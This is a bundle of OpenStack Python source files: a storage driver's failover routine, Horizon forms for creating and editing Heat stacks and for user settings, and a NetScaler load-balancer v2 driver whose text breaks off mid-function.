group_snapshot, sorted_snapshots, source_group, sorted_source_vols): """Create volume group from volume group or volume group snapshot.""" volume_group = Group(group) cg_enabled = True if volume_group.type_cg_snapshot else False return self._create_group_from_src(ctxt, group, volumes, group_snapshot, sorted_snapshots, source_group, sorted_source_vols, cg_enabled) def freeze_backend(self, ctxt): """Notify the backend that it's frozen.""" pass def thaw_backend(self, ctxt): """Notify the backend that it's unfrozen/thawed.""" pass @proxy.logger @proxy._trace_time def failover_host(self, ctxt, volumes, secondary_id): """Fail over the volume back and forth. if secondary_id is 'default', volumes will be failed back, otherwize failed over. """ volume_update_list = [] if secondary_id == strings.PRIMARY_BACKEND_ID: if not self._active_backend_id: msg = _LI("Host has been failed back. doesn't need " "to fail back again.") LOG.info(msg) return self._active_backend_id, volume_update_list else: if self._active_backend_id: msg = _LI("Host has been failed over to %s.") LOG.info(msg, self._active_backend_id) return self._active_backend_id, volume_update_list backend_id = self._replication._target_helper.backend['id'] if secondary_id is None: secondary_id = backend_id elif secondary_id != backend_id: msg = (_('Invalid secondary_backend_id specified. ' 'Valid backend id is %s.') % backend_id) raise exception.InvalidReplicationTarget(message=msg) LOG.debug("Starting failover to %s.", secondary_id) replicated_luns = [] for volume in volumes: lun = Lun(volume) if lun.type_replication and lun.status == "available": replicated_luns.append(lun) else: volume_update = ( self._replication.failover_unreplicated_volume(lun)) volume_update_list.append(volume_update) if replicated_luns: try: if secondary_id != strings.PRIMARY_BACKEND_ID: self._replication.do_pprc_failover(replicated_luns, secondary_id) self._active_backend_id = secondary_id replicated_luns = self._switch_backend_connection( secondary_id, replicated_luns) else: self._replication.start_pprc_failback( replicated_luns, self._active_backend_id) self._active_backend_id = "" self._helper = self._replication._source_helper except restclient.APIException as e: msg = (_("Unable to failover host to %(id)s. " "Exception= %(ex)s") % {'id': secondary_id, 'ex': six.text_type(e)}) raise exception.UnableToFailOver(reason=msg) for lun in replicated_luns: volume_update = lun.get_volume_update() volume_update['replication_status'] = ( 'failed-over' if self._active_backend_id else 'enabled') model_update = {'volume_id': lun.os_id, 'updates': volume_update} volume_update_list.append(model_update) else: LOG.info(_LI("No volume has replication capability.")) if secondary_id != strings.PRIMARY_BACKEND_ID: LOG.info(_LI("Switch to the target %s"), secondary_id) self._switch_backend_connection(secondary_id) self._active_backend_id = secondary_id else: LOG.info(_LI("Switch to the primary %s"), secondary_id) self._switch_backend_connection(self._active_backend_id) self._active_backend_id = "" return secondary_id, volume_update_list ```
{ "source": "2020human/horizon", "score": 2 }
#### File: project/stacks/forms.py ```python import json import logging import django from django.conf import settings from django.utils import html from django.utils.translation import ugettext_lazy as _ from django.views.decorators.debug import sensitive_variables # noqa from oslo_utils import strutils import six from horizon import exceptions from horizon import forms from horizon import messages from openstack_dashboard import api from openstack_dashboard.dashboards.project.images \ import utils as image_utils from openstack_dashboard.dashboards.project.instances \ import utils as instance_utils LOG = logging.getLogger(__name__) def create_upload_form_attributes(prefix, input_type, name): """Creates attribute dicts for the switchable upload form :type prefix: str :param prefix: prefix (environment, template) of field :type input_type: str :param input_type: field type (file, raw, url) :type name: str :param name: translated text label to display to user :rtype: dict :return: an attribute set to pass to form build """ attributes = {'class': 'switched', 'data-switch-on': prefix + 'source'} attributes['data-' + prefix + 'source-' + input_type] = name return attributes class TemplateForm(forms.SelfHandlingForm): class Meta(object): name = _('Select Template') help_text = _('Select a template to launch a stack.') # TODO(jomara) - update URL choice for template & environment files # w/ client side download when applicable base_choices = [('file', _('File')), ('raw', _('Direct Input'))] url_choice = [('url', _('URL'))] attributes = {'class': 'switchable', 'data-slug': 'templatesource'} template_source = forms.ChoiceField(label=_('Template Source'), choices=base_choices + url_choice, widget=forms.Select(attrs=attributes)) attributes = create_upload_form_attributes( 'template', 'file', _('Template File')) template_upload = forms.FileField( label=_('Template File'), help_text=_('A local template to upload.'), widget=forms.FileInput(attrs=attributes), required=False) attributes = create_upload_form_attributes( 'template', 'url', _('Template URL')) template_url = forms.URLField( label=_('Template URL'), help_text=_('An external (HTTP) URL to load the template from.'), widget=forms.TextInput(attrs=attributes), required=False) attributes = create_upload_form_attributes( 'template', 'raw', _('Template Data')) template_data = forms.CharField( label=_('Template Data'), help_text=_('The raw contents of the template.'), widget=forms.widgets.Textarea(attrs=attributes), required=False) attributes = {'data-slug': 'envsource', 'class': 'switchable'} environment_source = forms.ChoiceField( label=_('Environment Source'), choices=base_choices, widget=forms.Select(attrs=attributes), required=False) attributes = create_upload_form_attributes( 'env', 'file', _('Environment File')) environment_upload = forms.FileField( label=_('Environment File'), help_text=_('A local environment to upload.'), widget=forms.FileInput(attrs=attributes), required=False) attributes = create_upload_form_attributes( 'env', 'raw', _('Environment Data')) environment_data = forms.CharField( label=_('Environment Data'), help_text=_('The raw contents of the environment file.'), widget=forms.widgets.Textarea(attrs=attributes), required=False) if django.VERSION >= (1, 9): # Note(Itxaka): On django>=1.9 Charfield has an strip option that # we need to set to False as to not hit # https://bugs.launchpad.net/python-heatclient/+bug/1546166 environment_data.strip = False template_data.strip = False def __init__(self, *args, **kwargs): self.next_view = kwargs.pop('next_view') super(TemplateForm, self).__init__(*args, **kwargs) def clean(self): cleaned = super(TemplateForm, self).clean() files = self.request.FILES self.clean_uploaded_files('template', _('template'), cleaned, files) self.clean_uploaded_files('environment', _('environment'), cleaned, files) # Validate the template and get back the params. kwargs = {} if cleaned['environment_data']: kwargs['environment'] = cleaned['environment_data'] try: files, tpl =\ api.heat.get_template_files(cleaned.get('template_data'), cleaned.get('template_url')) kwargs['files'] = files kwargs['template'] = tpl validated = api.heat.template_validate(self.request, **kwargs) cleaned['template_validate'] = validated cleaned['template_validate']['files'] = files cleaned['template_validate']['template'] = tpl except Exception as e: raise forms.ValidationError(six.text_type(e)) return cleaned def clean_uploaded_files(self, prefix, field_label, cleaned, files): """Cleans Template & Environment data from form upload. Does some of the crunchy bits for processing uploads vs raw data depending on what the user specified. Identical process for environment data & template data. :type prefix: str :param prefix: prefix (environment, template) of field :type field_label: str :param field_label: translated prefix str for messages :type input_type: dict :param prefix: existing cleaned fields from form :rtype: dict :return: cleaned dict including environment & template data """ upload_str = prefix + "_upload" data_str = prefix + "_data" url = cleaned.get(prefix + '_url') data = cleaned.get(prefix + '_data') has_upload = upload_str in files # Uploaded file handler if has_upload and not url: log_template_name = files[upload_str].name LOG.info('got upload %s' % log_template_name) tpl = files[upload_str].read() if tpl.startswith('{'): try: json.loads(tpl) except Exception as e: msg = _('There was a problem parsing the' ' %(prefix)s: %(error)s') msg = msg % {'prefix': prefix, 'error': six.text_type(e)} raise forms.ValidationError(msg) cleaned[data_str] = tpl # URL handler elif url and (has_upload or data): msg = _('Please specify a %s using only one source method.') msg = msg % field_label raise forms.ValidationError(msg) elif prefix == 'template': # Check for raw template input - blank environment allowed if not url and not data: msg = _('You must specify a template via one of the ' 'available sources.') raise forms.ValidationError(msg) def create_kwargs(self, data): kwargs = {'parameters': data['template_validate'], 'environment_data': data['environment_data']} if data.get('stack_id'): kwargs['stack_id'] = data['stack_id'] return kwargs def handle(self, request, data): kwargs = self.create_kwargs(data) # NOTE (gabriel): This is a bit of a hack, essentially rewriting this # request so that we can chain it as an input to the next view... # but hey, it totally works. request.method = 'GET' return self.next_view.as_view()(request, **kwargs) class ChangeTemplateForm(TemplateForm): class Meta(object): name = _('Edit Template') help_text = _('Select a new template to re-launch a stack.') stack_id = forms.CharField(label=_('Stack ID'), widget=forms.widgets.HiddenInput) stack_name = forms.CharField(label=_('Stack Name'), widget=forms.TextInput(attrs={'readonly': 'readonly'})) class PreviewTemplateForm(TemplateForm): class Meta(object): name = _('Preview Template') help_text = _('Select a new template to preview a stack.') class CreateStackForm(forms.SelfHandlingForm): param_prefix = '__param_' class Meta(object): name = _('Create Stack') environment_data = forms.CharField( widget=forms.widgets.HiddenInput, required=False) if django.VERSION >= (1, 9): # Note(Itxaka): On django>=1.9 Charfield has an strip option that # we need to set to False as to not hit # https://bugs.launchpad.net/python-heatclient/+bug/1546166 environment_data.strip = False parameters = forms.CharField( widget=forms.widgets.HiddenInput) stack_name = forms.RegexField( max_length=255, label=_('Stack Name'), help_text=_('Name of the stack to create.'), regex=r"^[a-zA-Z][a-zA-Z0-9_.-]*$", error_messages={'invalid': _('Name must start with a letter and may ' 'only contain letters, numbers, underscores, ' 'periods and hyphens.')}) timeout_mins = forms.IntegerField( initial=60, label=_('Creation Timeout (minutes)'), help_text=_('Stack creation timeout in minutes.')) enable_rollback = forms.BooleanField( label=_('Rollback On Failure'), help_text=_('Enable rollback on create/update failure.'), required=False) def __init__(self, *args, **kwargs): parameters = kwargs.pop('parameters') # special case: load template data from API, not passed in params if kwargs.get('validate_me'): parameters = kwargs.pop('validate_me') super(CreateStackForm, self).__init__(*args, **kwargs) if self._stack_password_enabled(): self.fields['password'] = forms.CharField( label=_('Password for user "%s"') % self.request.user.username, help_text=_('This is required for operations to be performed ' 'throughout the lifecycle of the stack'), widget=forms.PasswordInput()) self._build_parameter_fields(parameters) def _stack_password_enabled(self): stack_settings = getattr(settings, 'OPENSTACK_HEAT_STACK', {}) return stack_settings.get('enable_user_pass', True) def _build_parameter_fields(self, template_validate): self.help_text = template_validate['Description'] params = template_validate.get('Parameters', {}) if template_validate.get('ParameterGroups'): params_in_order = [] for group in template_validate['ParameterGroups']: for param in group.get('parameters', []): if param in params: params_in_order.append((param, params[param])) else: # no parameter groups, simply sorted to make the order fixed params_in_order = sorted(params.items()) for param_key, param in params_in_order: field = None field_key = self.param_prefix + param_key field_args = { 'initial': param.get('Default', None), 'label': param.get('Label', param_key), 'help_text': html.escape(param.get('Description', '')), 'required': param.get('Default', None) is None } param_type = param.get('Type', None) hidden = strutils.bool_from_string(param.get('NoEcho', 'false')) if 'CustomConstraint' in param: choices = self._populate_custom_choices( param['CustomConstraint']) field_args['choices'] = choices field = forms.ChoiceField(**field_args) elif 'AllowedValues' in param: choices = map(lambda x: (x, x), param['AllowedValues']) field_args['choices'] = choices field = forms.ChoiceField(**field_args) elif param_type == 'Json' and 'Default' in param: field_args['initial'] = json.dumps(param['Default']) field = forms.CharField(**field_args) elif param_type in ('CommaDelimitedList', 'String', 'Json'): if 'MinLength' in param: field_args['min_length'] = int(param['MinLength']) field_args['required'] = field_args['min_length'] > 0 if 'MaxLength' in param: field_args['max_length'] = int(param['MaxLength']) if hidden: field_args['widget'] = forms.PasswordInput( render_value=True) field = forms.CharField(**field_args) elif param_type == 'Number': if 'MinValue' in param: field_args['min_value'] = int(param['MinValue']) if 'MaxValue' in param: field_args['max_value'] = int(param['MaxValue']) field = forms.IntegerField(**field_args) elif param_type == 'Boolean': field_args['required'] = False field = forms.BooleanField(**field_args) if field: self.fields[field_key] = field @sensitive_variables('password') def handle(self, request, data): prefix_length = len(self.param_prefix) params_list = [(k[prefix_length:], v) for (k, v) in data.items() if k.startswith(self.param_prefix)] fields = { 'stack_name': data.get('stack_name'), 'timeout_mins': data.get('timeout_mins'), 'disable_rollback': not(data.get('enable_rollback')), 'parameters': dict(params_list), 'files': json.loads(data.get('parameters')).get('files'), 'template': json.loads(data.get('parameters')).get('template') } if data.get('password'): fields['password'] = data.get('password') if data.get('environment_data'): fields['environment'] = data.get('environment_data') try: api.heat.stack_create(self.request, **fields) messages.info(request, _("Stack creation started.")) return True except Exception: exceptions.handle(request) def _populate_custom_choices(self, custom_type): if custom_type == 'neutron.network': return instance_utils.network_field_data(self.request, True) if custom_type == 'nova.keypair': return instance_utils.keypair_field_data(self.request, True) if custom_type == 'glance.image': return image_utils.image_field_data(self.request, True) if custom_type == 'nova.flavor': return instance_utils.flavor_field_data(self.request, True) return [] class EditStackForm(CreateStackForm): class Meta(object): name = _('Update Stack Parameters') stack_id = forms.CharField( label=_('Stack ID'), widget=forms.widgets.HiddenInput) stack_name = forms.CharField( label=_('Stack Name'), widget=forms.TextInput(attrs={'readonly': 'readonly'})) @sensitive_variables('password') def handle(self, request, data): prefix_length = len(self.param_prefix) params_list = [(k[prefix_length:], v) for (k, v) in data.items() if k.startswith(self.param_prefix)] stack_id = data.get('stack_id') fields = { 'stack_name': data.get('stack_name'), 'timeout_mins': data.get('timeout_mins'), 'disable_rollback': not(data.get('enable_rollback')), 'parameters': dict(params_list), 'files': json.loads(data.get('parameters')).get('files'), 'template': json.loads(data.get('parameters')).get('template') } if data.get('password'): fields['password'] = data.get('password') if data.get('environment_data'): fields['environment'] = data.get('environment_data') try: api.heat.stack_update(self.request, stack_id=stack_id, **fields) messages.info(request, _("Stack update started.")) return True except Exception: exceptions.handle(request) class PreviewStackForm(CreateStackForm): class Meta(object): name = _('Preview Stack Parameters') def __init__(self, *args, **kwargs): self.next_view = kwargs.pop('next_view') super(CreateStackForm, self).__init__(*args, **kwargs) def handle(self, request, data): prefix_length = len(self.param_prefix) params_list = [(k[prefix_length:], v) for (k, v) in data.items() if k.startswith(self.param_prefix)] fields = { 'stack_name': data.get('stack_name'), 'timeout_mins': data.get('timeout_mins'), 'disable_rollback': not(data.get('enable_rollback')), 'parameters': dict(params_list), 'files': json.loads(data.get('parameters')).get('files'), 'template': json.loads(data.get('parameters')).get('template') } if data.get('environment_data'): fields['environment'] = data.get('environment_data') try: stack_preview = api.heat.stack_preview(self.request, **fields) request.method = 'GET' return self.next_view.as_view()(request, stack_preview=stack_preview) except Exception: exceptions.handle(request) ``` #### File: settings/user/forms.py ```python from datetime import datetime # noqa from datetime import timedelta # noqa import string import babel import babel.dates from django.conf import settings from django import shortcuts from django.utils import encoding from django.utils import translation from django.utils.translation import ugettext_lazy as _ import pytz from horizon import forms from horizon import messages from horizon.utils import functions class UserSettingsForm(forms.SelfHandlingForm): max_value = getattr(settings, 'API_RESULT_LIMIT', 1000) language = forms.ChoiceField(label=_("Language")) timezone = forms.ChoiceField(label=_("Timezone")) pagesize = forms.IntegerField(label=_("Items Per Page"), min_value=1, max_value=max_value) instance_log_length = forms.IntegerField( label=_("Log Lines Per Instance"), min_value=1, help_text=_("Number of log lines to be shown per instance")) @staticmethod def _sorted_zones(): d = datetime(datetime.today().year, 1, 1) zones = [(tz, pytz.timezone(tz).localize(d).strftime('%z')) for tz in pytz.common_timezones] zones.sort(key=lambda zone: int(zone[1])) return zones def __init__(self, *args, **kwargs): super(UserSettingsForm, self).__init__(*args, **kwargs) # Languages def get_language_display_name(code, desc): try: desc = translation.get_language_info(code)['name_local'] desc = string.capwords(desc) except KeyError: # If a language is not defined in django.conf.locale.LANG_INFO # get_language_info raises KeyError pass return "%s (%s)" % (desc, code) languages = [(k, get_language_display_name(k, v)) for k, v in settings.LANGUAGES] self.fields['language'].choices = languages # Timezones timezones = [] language = translation.get_language() current_locale = translation.to_locale(language) babel_locale = babel.Locale.parse(current_locale) for tz, offset in self._sorted_zones(): try: utc_offset = _("UTC %(hour)s:%(min)s") % {"hour": offset[:3], "min": offset[3:]} except Exception: utc_offset = "" if tz == "UTC": tz_name = _("UTC") elif tz == "GMT": tz_name = _("GMT") else: tz_label = babel.dates.get_timezone_location( tz, locale=babel_locale) # Translators: UTC offset and timezone label tz_name = _("%(offset)s: %(label)s") % {"offset": utc_offset, "label": tz_label} timezones.append((tz, tz_name)) self.fields['timezone'].choices = timezones # When we define a help_text using any variable together with # form field, traslation does not work well. # To avoid this, we define here. (#1563021) self.fields['pagesize'].help_text = ( _("Number of items to show per page (applies to the pages " "that have API supported pagination, Max Value: %s)") % self.max_value) def handle(self, request, data): response = shortcuts.redirect(request.build_absolute_uri()) lang_code = data['language'] if lang_code and translation.check_for_language(lang_code): response = functions.save_config_value( request, response, settings.LANGUAGE_COOKIE_NAME, lang_code) response = functions.save_config_value( request, response, 'django_timezone', pytz.timezone(data['timezone']).zone) response = functions.save_config_value( request, response, 'API_RESULT_PAGE_SIZE', data['pagesize']) response = functions.save_config_value( request, response, 'INSTANCE_LOG_LENGTH', data['instance_log_length']) with translation.override(lang_code): messages.success(request, encoding.force_text(_("Settings saved."))) return response ```
{ "source": "2020human/neutron-lbaas", "score": 2 }
#### File: drivers/netscaler/netscaler_driver_v2.py ```python import abc from oslo_config import cfg from oslo_log import log as logging from neutron import context as ncontext from neutron.plugins.common import constants from oslo_service import service from neutron_lbaas._i18n import _, _LE from neutron_lbaas.drivers import driver_base from neutron_lbaas.drivers import driver_mixins from neutron_lbaas.services.loadbalancer.drivers.netscaler import ncc_client DEFAULT_PERIODIC_TASK_INTERVAL = "2" DEFAULT_STATUS_COLLECTION = "True" DEFAULT_PAGE_SIZE = "300" DEFAULT_IS_SYNCRONOUS = "True" PROV = "provisioning_status" NETSCALER = "netscaler" LOG = logging.getLogger(__name__) NETSCALER_CC_OPTS = [ cfg.StrOpt( 'netscaler_ncc_uri', help=_('The URL to reach the NetScaler Control Center Server.'), ), cfg.StrOpt( 'netscaler_ncc_username', help=_('Username to login to the NetScaler Control Center Server.'), ), cfg.StrOpt( 'netscaler_ncc_password', secret=True, help=_('Password to login to the NetScaler Control Center Server.'), ), cfg.StrOpt( 'periodic_task_interval', default=DEFAULT_PERIODIC_TASK_INTERVAL, help=_('Setting for periodic task collection interval from' 'NetScaler Control Center Server..'), ), cfg.StrOpt( 'is_synchronous', default=DEFAULT_IS_SYNCRONOUS, help=_('Setting for option to enable synchronous operations' 'NetScaler Control Center Server.'), ), cfg.StrOpt( 'netscaler_ncc_cleanup_mode', help=_( 'Setting to enable/disable cleanup mode for NetScaler Control ' 'Center Server'), ), cfg.StrOpt( 'netscaler_status_collection', default=DEFAULT_STATUS_COLLECTION + "," + DEFAULT_PAGE_SIZE, help=_('Setting for member status collection from' 'NetScaler Control Center Server.'), ) ] if not hasattr(cfg.CONF, "netscaler_driver"): cfg.CONF.register_opts(NETSCALER_CC_OPTS, 'netscaler_driver') LBS_RESOURCE = 'loadbalancers' LB_RESOURCE = 'loadbalancer' LISTENERS_RESOURCE = 'listeners' LISTENER_RESOURCE = 'listener' POOLS_RESOURCE = 'pools' POOL_RESOURCE = 'pool' MEMBERS_RESOURCE = 'members' MEMBER_RESOURCE = 'member' MONITORS_RESOURCE = 'healthmonitors' MONITOR_RESOURCE = 'healthmonitor' STATS_RESOURCE = 'stats' PROV_SEGMT_ID = 'provider:segmentation_id' PROV_NET_TYPE = 'provider:network_type' DRIVER_NAME = 'netscaler_driver' RESOURCE_PREFIX = 'v2.0/lbaas' STATUS_PREFIX = 'oca/v2' MEMBER_STATUS = 'memberstatus' PAGE = 'page' SIZE = 'size' PROVISIONING_STATUS_TRACKER = [] class NetScalerLoadBalancerDriverV2(driver_base.LoadBalancerBaseDriver): def __init__(self, plugin): super(NetScalerLoadBalancerDriverV2, self).__init__(plugin) self.driver_conf = cfg.CONF.netscaler_driver self.admin_ctx = ncontext.get_admin_context() self._init_client() self._init_managers() self._init_status_collection() def _init_client(self): ncc_uri = self.driver_conf.netscaler_ncc_uri ncc_username = self.driver_conf.netscaler_ncc_username ncc_password = self.driver_conf.netscaler_ncc_password ncc_cleanup_mode = cfg.CONF.netscaler_driver.netscaler_ncc_cleanup_mode self.client = ncc_client.NSClient(ncc_uri, ncc_username, ncc_password, ncc_cleanup_mode) def _init_managers(self): self.load_balancer = NetScalerLoadBalancerManager(self) self.listener = NetScalerListenerManager(self) self.pool = NetScalerPoolManager(self) self.member = NetScalerMemberManager(self) self.health_monitor = NetScalerHealthMonitorManager(self) def _init_status_collection(self): self.status_conf = self.driver_conf.netscaler_status_collection self.periodic_task_interval = self.driver_conf.periodic_task_interval status_conf = self.driver_conf.netscaler_status_collection (is_status_collection, pagesize_status_collection) = status_conf.split(",") self.is_status_collection = True if is_status_collection.lower() == "false": self.is_status_collection = False self.pagesize_status_collection = pagesize_status_collection self._init_pending_status_tracker() NetScalerStatusService(self).start() def _init_pending_status_tracker(self): # Initialize PROVISIONING_STATUS_TRACKER for loadbalancers in # pending state db_lbs = self.plugin.db.get_loadbalancers( self.admin_ctx) for db_lb in db_lbs: if ((db_lb.id not in PROVISIONING_STATUS_TRACKER) and (db_lb.provider.provider_name == NETSCALER) and (db_lb.provisioning_status.startswith("PENDING_"))): PROVISIONING_STATUS_TRACKER.append(db_lb.id) def collect_provision_status(self): msg = ("Collecting status ", self.periodic_task_interval) LOG.debug(msg) self._update_loadbalancers_provision_status() def _update_loadbalancers_provision_status(self): for lb_id in PROVISIONING_STATUS_TRACKER: lb_statuses = self._get_loadbalancer_statuses(lb_id) if lb_statuses: self._update_status_tree_in_db( lb_id, lb_statuses["lb_statuses"]) def _get_loadbalancer_statuses(self, lb_id): """Retrieve listener status from Control Center.""" resource_path = "%s/%s/%s/statuses" % (RESOURCE_PREFIX, LBS_RESOURCE, lb_id) try: statuses = self.client.retrieve_resource( "GLOBAL", resource_path)[1]['dict'] except ncc_client.NCCException as e: if e.is_not_found_exception(): return {"lb_statuses": None} else: return None statuses = statuses["statuses"] return {"lb_statuses": statuses} def _update_status_tree_in_db(self, lb_id, loadbalancer_statuses): track_loadbalancer = {"track": False} db_lb = self.plugin.db.get_loadbalancer(self.admin_ctx, lb_id) if (not loadbalancer_statuses and db_lb.provisioning_status == constants.PENDING_DELETE): try: self.load_balancer.successful_completion( self.admin_ctx, db_lb, delete=True) except Exception: LOG.error(_LE("error with successful completion")) PROVISIONING_STATUS_TRACKER.remove(lb_id) return else: status_lb = loadbalancer_statuses["loadbalancer"] status_listeners = status_lb["listeners"] for db_listener in db_lb.listeners: db_listener.loadbalancer = db_lb status_listener = (self. _update_entity_status_in_db(track_loadbalancer, db_listener, status_listeners, self.listener)) if not status_listener: continue db_pool = db_listener.default_pool if not db_pool: continue db_pool.listener = db_listener status_pools = status_listener['pools'] status_pool = self._update_entity_status_in_db(track_loadbalancer, db_pool, status_pools, self.pool) db_members = db_pool.members if not status_pool: continue status_members = status_pool['members'] for db_member in db_members: db_member.pool = db_pool self._update_entity_status_in_db(track_loadbalancer, db_member, status_members, self.member) db_hm = db_pool.healthmonitor if db_hm: db_hm.pool = db_pool status_hm = status_pool['healthmonitor'] self._update_entity_status_in_db(track_loadbalancer, db_hm, [status_hm], self.health_monitor) if not track_loadbalancer['track']: self._update_entity_status_in_db( track_loadbalancer, db_lb, status_lb, self.load_balancer) if not track_loadbalancer['track']: PROVISIONING_STATUS_TRACKER.remove(lb_id) def _update_entity_status_in_db(self, track_loadbalancer, db_entity, status_entities, entity_manager): if isinstance(status_entities, list): entity_status = self._get_entity_status( db_entity.id, status_entities) else: entity_status = status_entities self._check_and_update_entity_status_in_db( track_loadbalancer, db_entity, entity_status, entity_manager) return entity_status def _get_entity_status(self, entity_id, entities_status): for entity_status in entities_status: if entity_status and entity_status['id'] == entity_id: return entity_status return None def _check_and_update_entity_status_in_db(self, track_loadbalancer, db_entity, entity_status, entity_manager): if not db_entity.provisioning_status.startswith("PENDING_"): # no operation is attempted on this entity return if entity_status: if entity_status[PROV].startswith("PENDING_"): # an entity is not finished provisioning. Continue to track track_loadbalancer['track'] = True return if entity_status[PROV] == constants.ERROR: # Marked for failed completion try: entity_manager.failed_completion( self.admin_ctx, db_entity) except Exception: LOG.error(_LE("error with failed completion")) return if db_entity.provisioning_status == constants.PENDING_DELETE: # entity is under deletion # if entity is missing in lb status tree it should to be # deleted if entity_status: msg = ('Invalid status set for delete of %s in statuses', db_entity.id) LOG.error(msg) return try: entity_manager.successful_completion( self.admin_ctx, db_entity, delete=True) except Exception: LOG.error(_LE("error with successful completion")) return if entity_status[PROV] != constants.ACTIVE: msg = ('Invalid prov status for %s, should be ACTIVE ' "for CREATE and UPDATE", db_entity.id) LOG.error(msg) return try: entity_manager.successful_completion( self.admin_ctx, db_entity) except Exception: LOG.error(_LE("error with successful completion")) return class NetScalerCommonManager(driver_mixins.BaseManagerMixin): def __init__(self, driver): super(NetScalerCommonManager, self).__init__(driver) self.payload_preparer = PayloadPreparer() self.client = self.driver.client self.is_synchronous = self.driver.driver_conf.is_synchronous if self.is_synchronous.lower() == "false": self.is_synchronous = False else: self.is_synchronous = True def create(self, context, obj): LOG.debug("%s, create %s", self.__class__.__name__, obj.id) try: self.create_entity(context, obj) if self.is_synchronous: self.successful_completion(context, obj) else: self.track_provision_status(obj) except Exception: self.failed_completion(context, obj) raise def update(self, context, old_obj, obj): LOG.debug("%s, update %s", self.__class__.__name__, old_obj.id) try: self.update_entity(context, old_obj, obj) if self.is_synchronous: self.successful_completion(context, obj) else: self.track_provision_status(obj) except Exception: self.failed_completion(context, obj) raise def delete(self, context, obj): LOG.debug("%s, delete %s", self.__class__.__name__, obj.id) try: self.delete_entity(context, obj) if self.is_synchronous: self.successful_completion(context, obj, delete=True) else: self.track_provision_status(obj) except Exception: self.failed_completion(context, obj) raise def track_provision_status(self, obj): for lb in self._get_loadbalancers(obj): if lb.id not in PROVISIONING_STATUS_TRACKER: PROVISIONING_STATUS_TRACKER.append(lb.id) def _get_loadbalancers(self, obj): lbs = [] lbs.append(obj.root_loadbalancer) return lbs @abc.abstractmethod def create_entity(self, context, obj): pass @abc.abstractmethod def update_entity(self, context, old_obj, obj): pass @abc.abstractmethod def delete_entity(self, context, obj): pass class NetScalerLoadBalancerManager(NetScalerCommonManager, driver_base.BaseLoadBalancerManager): def __init__(self, driver): driver_base.BaseLoadBalancerManager.__init__(self, driver) NetScalerCommonManager.__init__(self, driver) def refresh(self, context, lb_obj): # This is intended to trigger the backend to check and repair # the state of this load balancer and all of its dependent objects LOG.debug("LB refresh %s", lb_obj.id) def stats(self, context, lb_obj): pass def create_entity(self, context, lb_obj): ncc_lb = self.payload_preparer.prepare_lb_for_creation(lb_obj) vip_subnet_id = lb_obj.vip_subnet_id network_info = self.payload_preparer.\ get_network_info(context, self.driver.plugin, vip_subnet_id) ncc_lb.update(network_info) msg = _("NetScaler driver lb creation: %s") % repr(ncc_lb) LOG.debug(msg) resource_path = "%s/%s" % (RESOURCE_PREFIX, LBS_RESOURCE) self.client.create_resource(context.tenant_id, resource_path, LB_RESOURCE, ncc_lb) def update_entity(self, context, old_lb_obj, lb_obj): update_lb = self.payload_preparer.prepare_lb_for_update(lb_obj) resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, LBS_RESOURCE, lb_obj.id) msg = (_("NetScaler driver lb_obj %(lb_obj_id)s update: %(lb_obj)s") % {"lb_obj_id": old_lb_obj.id, "lb_obj": repr(lb_obj)}) LOG.debug(msg) self.client.update_resource(context.tenant_id, resource_path, LB_RESOURCE, update_lb) def delete_entity(self, context, lb_obj): """Delete a loadbalancer on a NetScaler device.""" resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, LBS_RESOURCE, lb_obj.id) msg = _("NetScaler driver lb_obj removal: %s") % lb_obj.id LOG.debug(msg) self.client.remove_resource(context.tenant_id, resource_path) class NetScalerListenerManager(NetScalerCommonManager, driver_base.BaseListenerManager): def __init__(self, driver): driver_base.BaseListenerManager.__init__(self, driver) NetScalerCommonManager.__init__(self, driver) def stats(self, context, listener): # returning dummy status now LOG.debug( "Tenant id %s , Listener stats %s", context.tenant_id, listener.id) return { "bytes_in": 0, "bytes_out": 0, "active_connections": 0, "total_connections": 0 } def create_entity(self, context, listener): """Listener is created with loadbalancer """ ncc_listener = self.payload_preparer.prepare_listener_for_creation( listener) msg = _("NetScaler driver listener creation: %s") % repr(ncc_listener) LOG.debug(msg) resource_path = "%s/%s" % (RESOURCE_PREFIX, LISTENERS_RESOURCE) self.client.create_resource(context.tenant_id, resource_path, LISTENER_RESOURCE, ncc_listener) def update_entity(self, context, old_listener, listener): update_listener = self.payload_preparer.prepare_listener_for_update( listener) resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, LISTENERS_RESOURCE, listener.id) msg = (_("NetScaler driver listener %(listener_id)s " "update: %(listener_obj)s") % {"listener_id": old_listener.id, "listener_obj": repr(listener)}) LOG.debug(msg) self.client.update_resource(context.tenant_id, resource_path, LISTENER_RESOURCE, update_listener) def delete_entity(self, context, listener): """Delete a listener on a NetScaler device.""" resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, LISTENERS_RESOURCE, listener.id) msg = _("NetScaler driver listener removal: %s") % listener.id LOG.debug(msg) self.client.remove_resource(context.tenant_id, resource_path) class NetScalerPoolManager(NetScalerCommonManager, driver_base.BasePoolManager): def __init__(self, driver): driver_base.BasePoolManager.__init__(self, driver) NetScalerCommonManager.__init__(self, driver) def create_entity(self, context, pool): ncc_pool = self.payload_preparer.prepare_pool_for_creation( pool) msg = _("NetScaler driver pool creation: %s") % repr(ncc_pool) LOG.debug(msg) resource_path = "%s/%s" % (RESOURCE_PREFIX, POOLS_RESOURCE) self.client.create_resource(context.tenant_id, resource_path, POOL_RESOURCE, ncc_pool) def update_entity(self, context, old_pool, pool): update_pool = self.payload_preparer.prepare_pool_for_update(pool) resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, POOLS_RESOURCE, pool.id) msg = (_("NetScaler driver pool %(pool_id)s update: %(pool_obj)s") % {"pool_id": old_pool.id, "pool_obj": repr(pool)}) LOG.debug(msg) self.client.update_resource(context.tenant_id, resource_path, POOL_RESOURCE, update_pool) def delete_entity(self, context, pool): """Delete a pool on a NetScaler device.""" resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, POOLS_RESOURCE, pool.id) msg = _("NetScaler driver pool removal: %s") % pool.id LOG.debug(msg) self.client.remove_resource(context.tenant_id, resource_path) class NetScalerMemberManager(NetScalerCommonManager, driver_base.BaseMemberManager): def __init__(self, driver): driver_base.BaseMemberManager.__init__(self, driver) NetScalerCommonManager.__init__(self, driver) def create_entity(self, context, member): ncc_member = self.payload_preparer.prepare_member_for_creation(member) subnet_id = member.subnet_id network_info = (self.payload_preparer. get_network_info(context, self.driver.plugin, subnet_id)) ncc_member.update(network_info) msg = _("NetScaler driver member creation: %s") % repr(ncc_member) LOG.debug(msg) parent_pool_id = member.pool.id resource_path = 